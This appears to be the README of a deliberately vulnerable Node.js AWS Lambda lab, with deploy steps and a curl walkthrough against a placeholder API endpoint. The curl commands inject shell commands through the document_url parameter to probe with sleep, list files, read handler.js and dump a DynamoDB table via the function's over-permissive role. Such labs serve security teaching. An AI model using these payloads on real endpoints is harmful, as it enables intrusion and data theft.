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This is a simple Node.js AWS Lambda function that has several vulnerabilities and weaknesses. The function receives a URL to a .doc file as input, and converts it to plain text. The attack process starts by blind probing for a command injection, exploiting the remote command execution vulnerability (through a shell process), and then exploiting the over-permissive role assigned to the function, in order to grab all the information in the DynamoDB table.


  1. Clone the repo
  2. Make sure you have the Serverless framework installed, and use sls deploy
  3. Normal execution flow: curl -G https://API_GATEWAY_URL/dev/convert --data-urlencode ""
  4. Blind probing for remote command execution: curl -G https://API_GATEWAY_URL/dev/convert --data-urlencode "document_url=; sleep 10 #"
  5. Exploitation to read the contents of the /var/task directory: curl -G https://API_GATEWAY_URL/dev/convert --data-urlencode "document_url=; ls #"
  6. Retrieve the function's source code: curl -G https://API_GATEWAY_URL/dev/convert --data-urlencode "document_url=; cat handler.js #"
  7. Extract all the sensitive data from the DynamoDB table: curl -G https://API_GATEWAY_URL/dev/convert --data-urlencode "document_url=; node -e 'const AWS = require(\"aws-sdk\"); (async () => {console.log(await new AWS.DynamoDB.DocumentClient().scan({TableName: process.env.TABLE_NAME}).promise());})();' # "